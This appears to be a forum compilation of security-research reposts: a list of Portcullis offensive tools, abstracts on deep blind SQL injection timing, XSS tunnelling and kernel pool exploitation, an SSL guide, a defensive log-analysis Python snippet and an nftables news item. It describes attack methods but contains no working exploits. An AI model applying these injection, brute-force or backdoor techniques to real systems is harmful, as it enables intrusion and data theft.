vessl (30/10/2008) - vessl is a bash script that can fetch and verify the SSL certificate of a remote server.
enum4linux (16/9/2008) - A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
phrasen|drescher (27/6/2008) - A tool for bruteforce guessing pass phrases, password hashes or remote accounts of various services.
BSQL brute forcer V2 (18/6/2008) - Updated version of the Blind SQL Injection Brute Forcer from www.514.es. Works against PostgreSQL, MySQL, MSSQL and Oracle and supports custom SQL queries.
acccheck (9/4/2008) - The tool is designed as a password dictionary attack tool that targets Windows authentication via the SMB protocol. It is really a wrapper script around the 'smbclient' binary, and as a result is dependent on it for its execution.
MIBparse (7/4/2008) - MIBparse.pl has been designed as an offline parser to quickly parse output from SNMP tools such as 'snmpwalk'.
nbtscan-1.5.2 (3/4/2008) - NBTscan is a program for scanning IP networks for NetBIOS name information.
XSS Tunnel (2/4/2008) - XSS Tunnel is a standard HTTP proxy which sits on an attacker's system. Any tool that is configured to use it will tunnel its traffic through the active XSS Channel on the XSS Shell server.
Banner Grab (2/4/2008) - BannerGrab is a tool that performs connection, trigger-based and basic information collection from network services.
viewstate (2/4/2008) - Viewstate is an ASP.Net viewstate decoder, checker, parser and encoder.
Sun Patch Check (2/4/2008) - Sun Patch Check lists missing security patches by comparing the output from the Sun Solaris "showrev" command to that from the Sun recommended patch list.
XSS Shell (2/4/2008) - XSS Shell is a powerful XSS backdoor; in XSS Shell one can interactively send requests and get responses from the victim and it allows you to keep control of the session.
sucrack (31/3/2008) - sucrack is a multithreaded Linux/UNIX tool for brute-force cracking local user accounts via su.
rmiInfo (31/3/2008) - A tool for extracting information from Java Remote Method Invocation (RMI) services.
onesixtyone (31/3/2008) - An enhanced version of Solar Eclipse's SNMP Community string guessing tool.
http-dir-enum (28/3/2008) - A command-line tool for bruteforce-guessing directory and filenames on web servers.
BSQL Hacker (16/1/2008) - BSQL (Blind SQL) Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities in virtually any database.

Source: http://labs.portcullis.co.uk/tools/
-
[h=1]Deep Blind SQL Injection[/h]

Deep Blind SQL Injection is a new way to exploit Blind SQL Injections with a 66% reduction in the number of requests.

Ferruh Mavituna
www.portcullis-security.com

Blind SQL Injection attacks are described in several papers. If the injection point is completely blind then the only way to extract data is using time based attacks like WAITFOR DELAY, BENCHMARK etc. When it comes to reading data there are two known ways:
1. Reading data bit by bit
2. Reading data through a binary search algorithm with character patterns
Both methods have a one request – one response limit and on average for each char you need to make six requests to the server. In Deep Blind SQL Injection reading data is more complex than in classic blind injection. However it is still possible to retrieve data; moreover it is possible with a 66% reduction in the number of requests made of the server, requiring two rather than six requests to retrieve each char. Deep Blind SQL Injection works well with MS SQL Server and may work in other databases such as ORACLE, PostgreSQL etc. This method of injection, which retrieves more than one response per request, is achieved using time delay differences. For example, if the first half byte of the char is 6, the database is going to wait for 12 seconds; if the second half byte of the char is 1 it's going to wait for 2 seconds. An attacker should store server response times and divide them by 2 to understand the response. Finally, in 2 requests we got 0x61 which is 'a'. Obviously, depending on the condition, it's possible to use larger or smaller dividers than 2.

Download: http://labs.portcullis.co.uk/download/Deep_Blind_SQL_Injection.pdf
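The nibble-per-delay encoding described above leaves a distinctive timing signature on the server side. The following Python is an added example, not code from the paper or from Portcullis: it parses constructed access-log lines (client, method, path, response seconds), flags clients whose responses keep landing on multiples of the 2-second divider, and, for forensic triage, reconstructs which bytes such a run of delays would have exposed. The log layout and the 10.0.0.x clients are assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log lines (not real traffic): client, method, path, response time in seconds.
SAMPLE_LOG = """\
10.0.0.5 GET /product?id=1 0.12
10.0.0.5 GET /product?id=1 0.09
10.0.0.9 GET /product?id=1 12.03
10.0.0.9 GET /product?id=1 2.01
10.0.0.9 GET /product?id=1 12.05
10.0.0.9 GET /product?id=1 14.02
10.0.0.9 GET /product?id=1 6.01
10.0.0.9 GET /product?id=1 8.04
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) ([0-9.]+)$")  # assumed log layout


def parse_log(text):
    """Return (client, path, seconds) tuples, skipping malformed lines."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append((m.group(1), m.group(3), float(m.group(4))))
    return rows


def is_quantized(seconds, step=2.0, tol=0.2):
    """True if the response time sits on a non-zero multiple of `step` (within tol).
    A nibble of 0 produces no delay, so it looks like a normal response and is not flagged."""
    if seconds < step - tol:
        return False
    return abs(seconds - round(seconds / step) * step) <= tol


def suspicious_clients(text, step=2.0, min_hits=4):
    """Map (client, path) -> quantized delays, for clients with at least `min_hits` of them.
    Ordinary slow pages rarely land repeatedly on exact multiples of the divider."""
    hits = defaultdict(list)
    for client, path, secs in parse_log(text):
        if is_quantized(secs, step):
            hits[(client, path)].append(secs)
    return {k: v for k, v in hits.items() if len(v) >= min_hits}


def reconstruct_bytes(delays, step=2.0):
    """Forensic view of the exposure: consecutive delays pair up as (high nibble, low nibble),
    each nibble being delay / step, the same division the paper describes."""
    nibbles = [round(d / step) for d in delays]
    return bytes(hi * 16 + lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))
```

Tune `step` to the divider in use and `min_hits` to the page's normal latency profile; a zero nibble is invisible to timing alone, so reconstructed strings may have gaps.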
-
XSS Tunnelling
Tunnelling HTTP traffic through XSS Channels
Ferruh Mavituna
www.portcullis-security.com

XSS Tunnelling
About XSS Tunnelling
What Is An XSS Channel?
How Does XSS Shell Work?
Points of Interest
Why Is It Better Than The Classic XSS Attacks?
What Is XSS Tunnelling?
What Is An XSS Tunnel?
Why Tunnel HTTP Traffic Through An XSS Channel?
Benefits Of XSS Tunnelling
How Does XSS Tunnel Work?
An Attack Process

Download: http://labs.portcullis.co.uk/download/XSS-Tunnelling.pdf
-
SSL GOOD PRACTICE GUIDE
VERSION: 1.0
DATE: 20/09/2013
TASK NUMBER: SSL_Whitepaper
PREPARED BY: Mike W. Emery, Researcher, Portcullis Computer Security Limited, The Grange Barn, Pike's End, Pinner, Middlesex HA5 2EX, United Kingdom

CONTENTS
1 INTRODUCTION
2 SSL BASICS
3 RECOMMENDATIONS
4 AREAS OF CONCERN
5 SAMPLE IMPLEMENTATIONS
APPENDIX A: ABOUT PORTCULLIS COMPUTER SECURITY LIMITED

Download: http://labs.portcullis.co.uk/download/SSLGPG.pdf
-
Pool Blade: A new approach for kernel pool exploitation

Abstract

In recent years many methods have been discussed regarding exploitation of pool overflow corruptions. Most of these methods are based on the architecture of the pool manager in Windows. In this paper I am going to discuss a generic method that is based on kernel objects and not on the pool manager, and because of the nature of this technique it is possible to exploit pool overflow vulnerabilities more easily and reliably. So I introduce the Pool Blade helper class that lets us exploit a pool overflow in a very short time by just calling some interface and triggering the vulnerability. Pool Blade and the technique discussed here are only supported on Windows XP/2003/Vista, but they can be extended to support more recent Windows operating systems.

Q: Why Pool Blade?
A: Because this method is fast and reliable.
Q: How reliable?
A: With this technique we don't corrupt anything, so the exploit works 100%.
Q: Fast?
A: You have a pool overflow; you can exploit it in 5 minutes by just knowing the size of the vulnerable buffer.
Q: What is the impact?
A: Everyone can exploit local pool overflows on Windows easily and reliably to get escalated privileges.
Q: What is PoolBlade not?
A: It cannot be used to exploit pool overflows on Windows 7, and for small buffer sizes you should find other suitable objects. And of course it can be used only in the Non-paged pool.
Q: How can it be used?
A: You can use the PoolBlade helper class, or read the document and implement a more customized version for your own purpose.

The method and the helper class are demonstrated on an antivirus driver vulnerability in the following research paper.
White-paper: PoolBlade
Exploit-code: AhnlabV3MedCoreD
Video:
The demonstrated vulnerability is in the Ahnlab V3 internet security product. Of course, the vulnerability was reported to the vendor a few months ago.

Final note: as you may know, our Windows exploitation course, which contains kernel exploitation, has just been released; if you like, you can take it now!

Source: https://zdresearch.com/pool-blade-a-new-approach-for-kernel-pool-exploitation/
-
[h=1]NFTables IPTables-Replacement Queued For Linux 3.13[/h]
[h=2]Posted by Michael Larabel on October 19, 2013[/h]

NFTables is a new firewall subsystem / packet filtering engine for the Linux kernel that is poised to replace iptables. NFTables has been in development for several years by the upstream author of Netfilter. This new nftables system is set to be merged now into the Linux 3.13 kernel.

NFTables has been in development for years and is meant to replace IPTables by offering a simpler kernel ABI, reducing code duplication, improving error reporting, and providing more efficient support of filtering rules. Beyond IPTables, it also replaces the ip6tables, arptables, and ebtables frameworks, but nftables does offer a compatibility layer for iptables support. For those into networking and wanting to learn more about NFTables, visit its Netfilter.org project page.

Earlier this week a pull request was sent in for pulling nf_tables into the next Linux kernel release through the net-next branch. The pull request was accepted and the code is now living in the net-next Git repository for Linux 3.13. IPTables won't die off in Linux 3.13 as there's still work ahead for NFTables, but those wanting to try out the new code when it's mainlined can find this how-to guide.

Source: [Phoronix] NFTables IPTables-Replacement Queued For Linux 3.13